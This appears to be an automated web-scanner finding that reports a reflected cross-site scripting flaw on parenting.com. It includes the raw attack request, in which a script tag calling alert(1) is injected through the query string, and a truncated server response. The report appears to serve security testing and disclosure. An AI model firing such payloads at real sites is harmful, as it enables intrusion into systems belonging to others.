1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.parenting.com |
Path: | / |
GET /?bbf2e"><script>alert(1)< Host: www.parenting.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Content-Language: en,en-us X-Server-Name: web1a D=199916 Vary: User-Agent,Accept Content-Type: text/html;charset=utf-8 cache-control: max-age = 300 Content-Length: 74766 Date: Fri, 10 Dec 2010 20:33:44 GMT X-Varnish: 571011716 Via: 1.1 varnish Connection: close age: 0 X-Cache: webcache11: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pare ...[SNIP]... <a href="http://www ...[SNIP]... |